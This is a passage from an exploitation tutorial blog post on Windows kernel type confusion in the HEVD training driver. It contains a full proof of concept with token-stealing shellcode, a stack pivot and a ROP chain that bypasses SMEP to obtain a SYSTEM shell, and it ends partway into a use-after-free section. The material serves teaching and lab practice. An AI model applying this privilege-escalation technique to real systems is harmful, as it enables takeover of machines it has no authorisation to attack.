- Published on
Kernel Exploitation Primer 0x4 - Type Confusion & Use-After-Free Vulnerabilities
In previous post, we walked through some mitigation methods implemented in Windows and now let’s get start with exploiting some kernel driver vulnerabilities in HEVD.
Table of Contents
Type Confusion Vulnerability
HEVD has specific function for Type Confusion vulnerability which is TypeConfusionIoctlHandler
whose IOCTL code is 0x222023.
Before getting into the vulnerability, let’s learn a bit about what’s type casting.
Type casting in C/C++ is converting a variable from one data type to another. The purpose of type casting in C/C++ is to allow compatibility between different data types, enabling operations, comparisons, or assignments that wouldn't be allowed otherwise.
For example, You can cast an int
to a float
to perform precise mathematical calculations or cast a void*
to a specific pointer type to access its data.
There are different types of casting in C/C++, the classic C-style casting which is applicable for C++ too:
int a = 10;
float b = (float)a; // C-style cast
This is C++ static_cast type casting method:
int a = 10;
float b = static_cast<float>(a); // C++ static_cast
The others are dynamic_cast
and reinterpret_cast
, different type castings are used for different scenarios. Also, each type casting has difference in checks during compile-time or runtime to ensure safe and intended behavior.
The C-style cast is not type-safe and can lead to undefined behavior if misused. And they are not checked by compiler and causes issue in runtime. The static_cast
is checked by the compiler but not in runtime and it’s still dangerous to use. The dynamic_cast
is checked at runtime which makes it safer to use but it could cause performance overhead, so it’s not being used much.
Reference:
- https://stackoverflow.com/questions/1609163/what-is-the-difference-between-static-cast-and-c-style-casting
- https://www.youtube.com/watch?v=SIAuhzQqAow
- https://cwe.mitre.org/data/definitions/843.html
IDA Analysis
Things goes wrong when there is a misinterpretation of type casting. Let’s get back to the TypeConfusionIoctlHandler
, this function makes a call to TriggerTypeConfusion
function with the user input (IO_STACK_LOCATION→Parameters.DeviceIoControl.Type3InputBuffer
== IrpSp+0x20
).
The TriggerTypeConfusion
function takes 1 argument (pointer to user input) which is USER_TYPE_CONFUSION_OBJECT
structure. And this structure contains 2 members ObjectID
and ObjectType
.
So the user input is a structure (USER_TYPE_CONFUSION_OBJECT
) of 0x10 bytes and it’s denoted as UserTypeConfusionObject
variable which is then moved to RBX register (1️⃣) [ RBX = UserTypeConfusionObject(USER_TYPE_CONFUSION_OBJECT) ].
Moving on, there is a call to ExAllocatePoolWithTag() API 2️⃣ which allocates pool memory of the specified type and returns a pointer of the allocated block and here it allocates 0x10 bytes of NonPagedPool type based on the arguments passed to it.
Interestingly it type cast the return pointer (PVOID) of ExAllocatedPoolWithTag
to _KERNEL_TYPE_CONFUSION_OBJECT
. But in assembly you won’t see this type casting, instead the returned address will simply be copied into the PoolWithTag
variable (mov r14, rax
3️⃣ where r14
is PoolWithTag
1️⃣ which is _KERNEL_TYPE_CONFUSION_OBJECT
structure) [ R14 = PoolWithTag (KERNEL_TYPE_CONFUSION_OBJECT) ].
In assembly, everything boils down to raw bits and bytes. The concept of "types" or “type casting” that we're familiar with from high-level languages (like int, float, char, etc.) simply doesn't exist at the assembly level.
Checking _KERNEL_TYPE_CONFUSION_OBJECT
structure, it contains 2 members, the first member is ObjectID
and the second member is an UNION
which contains 2 members ObjectType
and Callback
.
Something to know about UNION
, that all members of a union share the same memory location. The size of a union is determined by its largest member. In this case, both ObjectType
and Callback
are 8 bytes (on 64-bit systems), so they occupy the same 8 bytes.
Moving on, there are few operations happening here, let’s have a quick recall about the registers,
- RBX is the pointer to the user input
UserTypeConfusionObject
, which is an instance of theUSER_TYPE_CONFUSION_OBJECT
structure. - R14 points to a memory region allocated using
ExAllocatePoolWithTag()
. This memory is type-cast intoPoolWithTag
which is aKERNEL_TYPE_CONFUSION_OBJECT
structure.
- 1️⃣ it dereferences RBX register, copying the first 8 bytes to RAX register. According to
USER_TYPE_CONFUSION_OBJECT
(UserTypeConfusionObject
) the first member isObjectID
so RAX holdsObjectID
. - 2️⃣ the RAX value (which contains
ObjectID
) is copied to the address pointed to byR14
, which is the newly allocated region and it’s aKERNEL_TYPE_CONFUSION_OBJECT
(PoolWithTag
) structure, and it’s first 8 bytes isObjectID
as well. This means it copies theUserTypeConfusionObject->ObjectID
toPoolWithTag->ObjectID
. - 3️⃣ it dereference RBX+8, fetching the next 8 bytes of
USER_TYPE_CONFUSION_OBJECT
(which isObjectType
member) to RAX register. - 4️⃣ the
RAX
value (now holdingObjectType
) is copied to the addressR14+8
, This position in theKERNEL_TYPE_CONFUSION_OBJECT
is aUNION
with two members. Here is the interesting thing, both the members of this UNION are 8 bytes, so it can be eitherObjectType
orCallback
.
typedef struct _USER_TYPE_CONFUSION_OBJECT {
unsigned __int64 ObjectID;
unsigned __int64 ObjectType;
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;
typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
unsigned __int64 ObjectID;
union {
unsigned __int64 ObjectType;
void (*Callback);
};
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;
Let’s have a look at how UNION
causes the type confusion here, as I explained earlier, the size of a union is determined by its largest member. Here is a quick example.
#include <stdio.h>
int main() {
char secret[10] = "1337";
union Data {
void* normalcall; // 8 bytes
void* maliciouscall; // 8 bytes
};
union Data data;
data.normalcall = &secret;
printf("Size of union: %lu bytes\n", sizeof(data));
printf("normalcall value: %p\n", data.normalcall);
printf("maliciouscall value: %p\n", data.maliciouscall);
}
- We define a
union
namedData
with two members:normalcall
andmaliciouscall
, both of which are pointers (void*
), typically 8 bytes on a 64-bit system. - A
char
array namedsecret
is initialized with the string"1337"
. - We assign the address of
secret
todata.normalcall
. This meansdata.normalcall
now points to the start of thesecret
array. - We print the size of the
union
. Since both members are 8 bytes, the size of theunion
is 8 bytes, the size of its largest member. - We print the value of
data.normalcall
, which will show the address ofsecret
. - We then print the value of
data.maliciouscall
. Even though we never explicitly assigned a value tomaliciouscall
, let’s see what we get.
By executing the binary,
- We get the size of the
union
, which is 8 bytes. - Next, we see the address stored in
normalcall
, which points to the address ofsecret
. That seems correct. - Then we print the
maliciouscall
and that also prints the same address? This demonstrates that theunion
shares the same memory space. Because of this shared memory, even if the application retrieves the address frommaliciouscall
, it will still be the address stored innormalcall
. - This behavior applies regardless of differing data types; it depends on how the application or binary handles the data.
> .\binary.exe
Size of union: 8 bytes
normalcall value: 000000FC539EFCB0
maliciouscall value: 000000FC539EFCB0
In the example above, both members are 8 bytes (void). However, let's consider a scenario where one member is an int
(4 bytes) and the other is void
(8 bytes). The overall size would still be 8 bytes, meaning it can hold upto 8 bytes of data. When I say it depends on how the application handles the data, I mean that if the program reads the int
, it will only take the first 4 bytes. However, if it then uses the second member of the UNION
, which is the void
(pointer), it will interpret the 8 bytes that were stored. The application can still protect against this by verifying that the received data is only 4 bytes (for the int
) and blocking the input if it detects that you provided 8 bytes for the second UNION
member.
Back to IDA, 2️⃣ there is a call to TypeConfusionObjectInitializer
and before that call 1️⃣ there is a mov
operation where it copies R14
register to UserTypeConfusionObject
(RCX
register). If you scroll above you know that R14 is the PoolWithTag
(_KERNEL_TYPE_CONFUSION_OBJECT
). So this structure is provided as an argument to TypeConfusionObjectInitializer
call.
TypeConfusionObjectInitializer
- 1️⃣ defines that RCX (the input
_KERNEL_TYPE_CONFUSION_OBJECT
) is considered asKernelTypeConfusionObject
. - 2️⃣ the
KernelTypeConfusionObject
is copied to RBX register. - 3️⃣ then it dereference RBX+8 which is the 2nd member (
UNION
) and it calls that value.
We already know that _KERNEL_TYPE_CONFUSION_OBJECT
holds 2 members: ObjectID
and a union (ObjectType
& Callback
). If you see the source code of this function, it makes a call to the Callback
member.
typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
unsigned __int64 ObjectID;
union {
unsigned __int64 ObjectType;
void (*Callback);
};
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;
We know that the user input’s (USER_TYPE_CONFUSION_OBJECT
) ObjectType
is copied to _KERNEL_TYPE_CONFUSION_OBJECT
’s ObjectType
. Since it is a member of the union, it also shares the same memory space with Callback
. As a result, when the call occurs, it actually invokes the value we sent in ObjectType
.
Exploitation
Let’s try this theory, I wrote the following code, where I created a structure called _MY_USER_INPUT
, this is what we are gonna send to the driver, it contains 2 members and I assigned them with dummy values for now. ObjectID
contains 0x4141414141414141
and ObjectType
contains 0x4242424242424242
.
#include <Windows.h>
#include <stdio.h>
#include "ioctl.h"
typedef struct _MY_USER_INPUT {
void* ObjectID;
void* ObjectType; // Callback
} MY_USER_INPUT, *PMY_USER_INPUT;
int main()
{
printf("[+] Opening handle to driver\n");
HANDLE hDriver = CreateFileW(
L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
0,
nullptr);
if (hDriver == INVALID_HANDLE_VALUE)
{
printf("[!] Failed to open handle: %d", GetLastError());
return 1;
}
_MY_USER_INPUT input;
input.ObjectID = (LPVOID)(0x4141414141414141);
input.ObjectType = (LPVOID)(0x4242424242424242); // Callback
printf("[+] Calling TYPE_CONFUSION_VULN....");
NTSTATUS success = DeviceIoControl(
hDriver,
TYPE_CONFUSION_VULN,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
return 0;
}
Since we know the IOCTL code to invoke TypeConfusionIoctlHandler
function, using the online decoder I got rest of the information (I can just use the IOCTL code too).
Placed a breakpoint to the call to TriggerTypeConfusion
function. Since our user-mode application calls the IOCTL of this function anyways.
Ran the user-mode application on the Debuggee machine and got hit. We can see the RCX contains the pointer to structure of what I sent.
Moving on, after the call to ExAllocatePoolWithTag() API, it copies the user input (RBX) to the newly allocated region (R14) PoolWithTag
(_KERNEL_TYPE_CONFUSION_OBJECT
).
Next, the call to TypeConfusionObjectInitializer
that has the pointer to _KERNEL_TYPE_CONFUSION_OBJECT
as an argument.
Moving on, we reach the call to [RBX+8]
which is the _KERNEL_TYPE_CONFUSION_OBJECT
’s second member Callback
(union) function. So this means that this function will call whatever pointer we place in the ObjectType
field.
Now that we know our attack path, we can try to execute our shellcode but SMEP is enabled so we can’t allocate some user-mode region using VirtualAlloc()
and provide that address as ObjectType
to execute, SMEP will block that, so we can try to disable it like before. But we can provide only one ROP gadget to ObjectType
.
So if we get proper gadget, we can pivot the stack to user-mode and create a fake stack to execute rest of our ROP gadget to disable the SMEP. HVCI is disabled for this scenario.
I found this gadget using ROPGadget and address 0x83000000
is within the user-space (from 0 to 0x000007FFFFFEFFFF).
0x000000014059f24e : mov esp, 0x83000000 ; ret
Updated the POC and we need to bypass kASLR as well, so re-used the same getbaseaddress()
that I used in my previous posts. Used VirtuaAlloc()
to allocate the region (fake stack) and we know the address of the stack (0x83000000) that will be pivoted to, so used that as starting address (lpAddress) for VirtualAlloc()
.
#include <Windows.h>
#include <stdio.h>
#include "ioctl.h"
#include <psapi.h>
typedef struct _MY_USER_INPUT {
void* ObjectID;
void* ObjectType; // Callback
} MY_USER_INPUT, *PMY_USER_INPUT;
PVOID getbaseaddress()
{
BOOL status;
LPVOID* pImageBase;
DWORD ImageSize;
status = EnumDeviceDrivers(nullptr, 0, &ImageSize);
pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);
LPVOID ntaddr = pImageBase[0];
return ntaddr;
}
int main()
{
printf("[+] Opening handle to driver\n");
HANDLE hDriver = CreateFileW(
L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
0,
nullptr);
if (hDriver == INVALID_HANDLE_VALUE)
{
printf("[!] Failed to open handle: %d", GetLastError());
return 1;
}
LPVOID nt_addr = getbaseaddress();
printf("[+] Nt base address: %p\n", nt_addr);
_MY_USER_INPUT input;
input.ObjectID = (LPVOID)(0x4141414141414141);
input.ObjectType = (LPVOID)((uintptr_t)nt_addr + 0x0059f24e); // mov esp, 0x83000000 ; ret
uintptr_t STACK_PIVOT = 0x83000000;
LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT), 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("[+] Allocated region: %p\n", fakeStack);
getchar();
printf("[+] Calling TYPE_CONFUSION_VULN....");
NTSTATUS success = DeviceIoControl(
hDriver,
TYPE_CONFUSION_VULN,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
return 0;
}
Placed a breakpoint on the call to Callback
and when it attempts to execute our stack pivot gadget, it ended up in an error:
Error 1: EXCEPTION_DOUBLE_FAULT
Analyzing the error, it’s an UNEXPECTED_KERNEL_MODE_TRAP
and the first parameter (Arg1) shows 0x8 which is EXCEPTION_DOUBLE_FAULT
. The third parameter (Arg3) shows the address 0x83000000
where the error occurred.
After some googling and reading the documentation and research of other researchers, I figured the following might have happened:
- Once the stack pivot is performed, the kernel driver tried to access the user-mode address
0x83000000
, and since this allocated region is just empty (since there is no data inside this region of 0x1000), it might be paged-out (Memory that has been temporarily moved from RAM to disk to free up space for active processes). - So when the driver tried to access
0x83000000
, the MMU (memory management unit) walks the PTE (Page Table Entry) to find the physical address and since it’s paged out, the CPU will trigger an exception this is called page fault. In our scenario this is the first fault. - Usually to handle the page fault, the CPU tries to saves the current execution context (including registers and program counter) to a structure called a trap frame (_KTRAP_FRAME) in the stack. And in our scenario it couldn’t save it so the second fault occurred. This is the reason of
EXCEPTION_DOUBLE_FAULT
.
By using !pte
command on the virtual address, it shows zeros, this means the region is paged-out mostly. And the page fault occurred to page-in this region.
According to the documentation, of this double fault, it might have occurred because the kernel tries to do stuffs in unmapped region:
The first cause is a kernel stack overflow. This overflow occurs when a guard page is hit, and the kernel tries to push a trap frame. Because there's no stack left, a stack overflow results, causing the double fault.
Let’s analyze this further, added getchar()
before calling DeviceIoControl()
and opened the user-mode application in VMMap.
Using VirtualAlloc()
we allocated the address from 0x83000000
with 0x1000 bytes of region and Windows won’t work with bytes, it works with pages (4KB). Even you allocate a small region it allocates as a whole page. VirtualAlloc()
sometimes allocate 64KB as a page for an efficient size for memory management and system performance.
This is the simple representation of what’s going on here. So I believe this is what might have happened, the kernel tried to access the address 0x83000000
and it’s paged-out so caused a page fault and the CPU tried to save the trap frame in the stack. Since the stack grows downwards and the allocated address is at the end of the page, the page before that it’s an unmapped region. The EXCEPTION_DOUBLE_FAULT
error occurred.
The reason why I said this might be a reason is because, there is something else which we need to consider which is Interrupt Request Level (IRQL), so if the IRQL is running at higher level and it tries to page-in the user-space address it will also leads to BSOD. But more about this is covered in Error 2 topic (below).
To solve this issue, we can try the following:
- We need to allocate some memory before the stack pivot address (
0x83000000
) for the trap frame or other kernel operations, because we pivoted the stack to user-space and kernel does more things so it’s better to allocate this region in our fake stack. - We need to make sure the allocated region is always paged-in, we can try this using
VirtualLock()
and we can also write some data inside this region to make sure it paged-in but the user-space address can not be guaranteed to be paged-in.
This is the updated POC,
- Added a page 0x1000 (4KB) of space before the fake stack and also increased the total allocated region to 0x5000.
- Used
VirtualLock()
to page-in the memory region and filled the whole allocated region with A’s (later I overwrite some with ROP). - After the pivot it lands to my ROP gadgets, which is just
NOP; RET
, just to see if the gadgets are being executed successfully.
uintptr_t STACK_PIVOT = 0x83000000;
LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x5000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("[+] Allocated region: %p\n", fakeStack);
if (!VirtualLock(fakeStack, 0x5000)) {
printf("Error using VirtualLock: %d\n", GetLastError());
}
memset(fakeStack, 'A', 0x5000);
int index = 0;
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc); // nop; ret
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);
Back the callback()
pointer and I checked the allocated region, this time it’s paged-in, and I can see the 3 ROP gadget too.
Even though, everything seems good, when I try to execute the ROP gadget to pivot the stack, it ended up again in the same EXCEPTION_DOUBLE_FAULT
.
Not only that, the allocated region (< 0x83000000
) above the stack pivot address (0x83000000
) seems paged out.
Memory management is such a complex thing, I read few other researchers articles (referenced below) and this is my theory of what’s going on here, since I allocated a very smaller region 0x5000 (20KB) and even VirtualLock()
call succeed in locking the page, it’s not always the case. There are some scenarios the memory will be silently paged-out (like what’s going on here). So I increased the region to bigger 0x10000 (64KB) size, as I explained earlier Windows works with pages and there is something called memory block, which is typically 64KB in size, this is for better allocation granularity.
uintptr_t STACK_PIVOT = 0x83000000;
LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("[+] Allocated region: %p\n", fakeStack);
if (!VirtualLock(fakeStack, 0x10000)) {
printf("Error using VirtualLock: %d\n", GetLastError());
}
memset(fakeStack, 'A', 0x10000);
int index = 0;
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc); // nop; ret
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);
*((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc);
After compiling and running the new POC, I could see the allocated region (< 0x83000000
) above the pivot stack, where I see the assigned A’s. And followed by that, the ROP gadget to pivot the stack is executed successfully.
Error 2: IRQL_NOT_LESS_OR_EQUAL
Now that the stack pivot was successful (it reached the ret
instruction, it didn’t previously), it should execute the other ROP gadgets (NOP; RET
) from the stack but that’s not the case.
It ended up in IRQL_NOT_LESS_OR_EQUAL
. This error occurs only after the stack pivot and when it tires to execute my other ROP gadgets.
Arg1
shows the address that couldn't be accessed and leads to the issue.Arg2
shows the IRQL as 0xFF and it states itself (highlighted) that it attempted to access paged out or invalid memory region at a higher IRQL.
Let’s have a brief explanation about Interrupt Request Level (IRQL):
In Windows, there is a concept called Interrupts, an interrupt is a signal from hardware or software indicating an event that needs immediate attention. They temporarily halt the current code execution, allowing the interrupt handler (a specific routine) to execute. Once the interrupt is handled, the processor resumes the previous task.
Interrupt Request Level (IRQL) determines the priority of the interrupts. It is a associated with the CPU. There are different IRQL levels:
- PASSIVE_LEVEL (0) - Normal user-mode/kernel-mode execution.
- APC_LEVEL (1) - Asynchronous Procedure Calls.
- DISPATCH_LEVEL (2) - Thread scheduling, DPCs.
- DIRQL (3-26) - Device interrupts.
- POWER_LEVEL (30) - Power failure handling.
- HIGH_LEVEL (31) - Used for critical system operations.
Here is a quick example:
- When you press a key in the keyboard, the keyboard controller sends an interrupt signal to the CPU.
- Let’s say there is a processor running some task at a low IRQL while processing regular tasks (e.g., IRQL = 0, PASSIVE_LEVEL).
- The keyboard interrupt might be assigned a higher IRQL (e.g., IRQL = 1, DISPATCH_LEVEL).
- The CPU temporarily pauses the low IRQL task, processes the keyboard interrupt, and then resumes the previously interrupted task once the interrupt handling is complete.
The most notable points we need in this situation are:
- At Low IRQLs (PASSIVE_LEVEL): The system can handle page faults because it can pause the current thread, fetch the required page from disk, and then resume execution.
- At High IRQLs (DISPATCH_LEVEL and above): The system cannot handle page faults because paging operations (disk I/O) will take time. Since high IRQL levels must be serviced immediately and cannot wait for such operations, it could result in a crash (bug check).
Now with that in mind, after some analysis, following is my understanding:
Scenario 1:
- Initially, the driver operates at an IRQL below
DISPATCH_LEVEL
. However, when we interact with the specific IOCTL, at certain conditions it may trigger an escalation of the IRQL to a level higher thanDISPATCH_LEVEL
. This escalation will ensure that other processors halt their operations, allowing this task to proceed. - During this high IRQL operation, the driver attempts to access the ROP gadgets located in user-space memory (
0x83000000
). Even though we tried to lock the memory regions usingVirtualLock
to prevent paging, as I said earlier there is no guarantee that these pages remain resident in memory at all times. - According to MSDN: When you lock memory with
VirtualLock
it locks the memory into your process's working set. It doesn't mean that the memory will never be paged out. It just means that the memory won't be paged out as long as there is a thread executing in your process, because a process's working set needs be present in memory only when the process is actually executing. - So if the memory is paged out and a page fault occurs, the system cannot handle the page fault at this elevated IRQL. Consequently, this situation leads to a
IRQL_NOT_LESS_OR_EQUAL
error, as the system is unable to resolve the page fault while operating at a high IRQL.
I have 2 virtual processors in my machine and as you can see in this scenario, the IRQL is escalated to 13 and caused the IRQL_NOT_LESS_OR_EQUAL
error.
Scenario 2:
- However, the above scenario is not consistent. There are some instances where the exploit works successfully. This might be because when the processor accesses the ROP gadget while the IRQL remains at a lower level. In this scenario, even if the memory is initially paged out, the system can page it back in without any issues, as the lower IRQL allows the page fault to be handled appropriately. As a result, the exploit executes successfully without triggering an
IRQL_NOT_LESS_OR_EQUAL
error.
As you see in this scenario, the IRQL didn’t changed and the ROP gadget is executed successfully:
The results may vary depending on the hardware configuration of different machines. Systems with more RAM and additional processors may experience a higher success rate. In such cases the IRQL might not need to be raised as often, and the system can handle tasks more smoothly.
User-mode cannot control the page-in process. Even if you use VirtualLock
or other user-mode methods, the memory may or may not be paged-in, it depends on the system's load. So this concludes:
- If the allocated memory is paged-in (stored in physical memory), everything works fine.
- If the allocated memory is paged-out (stored in the page file) and a page fault occurs while the IRQL is higher, it cannot handle the page fault, leading to failure.
- If the allocated memory is paged-out (stored in the page file) and a page fault occurs while the IRQL is lower, the memory can be paged-in successfully.
If we avoid scenario 1, the exploit will work fine. This depends on the machine load and it’s efficiency.
For the below POC, I used the same ROP gadgets which I used to bypass the SMEP & VBS, here (HVCI is disabled).
Let’s start from the beginning, after the stack pivot, it begins to execute the ROP and the fake stack frame looks good, and it does the same operation to bypass SMEP & VBS, it find’s the PTE of the shellcode and flips the “U” flag to “K” and execute the shellcode.
It worked, by exploiting TypeConfusion vulnerability, it gives a shell as SYSTEM.
Full POC:
#include <Windows.h> #include <stdio.h> #include "ioctl.h" #include <psapi.h> typedef struct _MY_USER_INPUT { void* ObjectID; void* ObjectType; // Callback } MY_USER_INPUT, *PMY_USER_INPUT; PVOID getbaseaddress() { BOOL status; LPVOID* pImageBase; DWORD ImageSize; status = EnumDeviceDrivers(nullptr, 0, &ImageSize); pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize); LPVOID ntaddr = pImageBase[0]; return ntaddr; } uintptr_t MiGetPte(LPVOID lpMemory) { uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory); uintptr_t calc1 = addr >> 9; // shr rcx, 9 uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx return calc2; } int main() { printf("[+] Opening handle to driver\n"); HANDLE hDriver = CreateFileW( L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr); if (hDriver == INVALID_HANDLE_VALUE) { printf("[!] Failed to open handle: %d", GetLastError()); return 1; } LPVOID nt_addr = getbaseaddress(); printf("[+] Nt base address: %p\n", nt_addr); BYTE shellcode[256] = { 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d, 0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8, 0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8, 0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa, 0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48, 0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; LPVOID lpMemory = VirtualAlloc(NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE); printf("[+] Shellcode address: %p\n", lpMemory); memcpy(lpMemory, shellcode, sizeof(shellcode)); uintptr_t ShellcodePte = MiGetPte(lpMemory); printf("[+] PTE calculated shellcode address: %p\n", (void*)ShellcodePte); _MY_USER_INPUT input; input.ObjectID = (LPVOID)(0x4141414141414141); input.ObjectType = (LPVOID)((uintptr_t)nt_addr + 0x0059f24e); // mov esp, 0x83000000 ; ret uintptr_t STACK_PIVOT = 0x83000000; LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); printf("[+] Allocated region: %p\n", fakeStack); if (!VirtualLock(fakeStack, 0x10000)) { printf("Error using VirtualLock: %d\n", GetLastError()); } memset((LPVOID)fakeStack, 0x10000, '\x41'); int index = 0; *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc); // nop; ret *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00202e71); // pop rcx; ret *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)ShellcodePte; // Shellcode in user-mode *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201862); // pop rax; ret *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // nt!MiGetPteAddress+0x13 *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027bcbf); // mov rax, qword ptr [rax]; ret *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0020e204); // add rax, rcx; ret *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201861); // pop r8 ; ret *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)(0xfffffffffffffffc); // -4 *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x003fd49b); // add qword ptr [rax], r8 ; ret *((LPVOID*)(STACK_PIVOT)+index++) = lpMemory; // Shellcode in user-mode // getchar(); printf("[+] Calling TYPE_CONFUSION_VULN...."); NTSTATUS success = DeviceIoControl( hDriver, TYPE_CONFUSION_VULN, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return 1; } printf("[+] Spawning a shell with elevated privileges\n\n"); system("cmd"); return 0; }
Use-After-Free Vulnerability
A Use-After-Free (UAF) vulnerability occurs when a program continues to use a pointer to a memory region that has already been freed or deallocated. This vulnerability arises when the reference to the freed memory is not properly set to NULL
, allowing the program to inadvertently reuse the pointer. If the freed memory is reallocated for another purpose, reusing the old pointer can lead to undefined behavior and potentially arbitrary code execution. It’s also called as dangling pointer.
In HEVD, we will be using multiple functions to perform UAF attack:
- AllocateUaFObjectNonPagedPool (
0x222013
) - This function will allocate a NonPagedPool of 0x60 bytes with a tag “Hack” and store the pointer to the region in a global variable. - FreeUaFObjectNonPagedPool (
0x22201B
) - This function will free the allocated region using the global variable but forgets to set NULL to the global variable which makes it as a dangling pointer. - UseUaFObjectNonPagedPool (
0x222017
) - This function will use the global variable pointer and get the first 8 bytes (pointer) and execute it. - AllocateFakeObjectNonPagedPool (
0x22201F
) - This function will allocate a NonPagedPool of 0x58 bytes with user’s input, which will be used to exploit this vulnerability.
This is just a small explanation about the functions, more about this explained below.
IDA Analysis
AllocateUaFObjectNonPagedPool
Let’s begin with the first function which is AllocateUaFObjectNonPagedPoolIoctlHandler
function, which makes a call to AllocateUaFObjectNonPagedPool
and this call does not takes any arguments.
Diving into AllocateUaFObjectNonPagedPool
function, it calls ExAllocatePoolWithTag()
API, which usually takes 3 arguments,
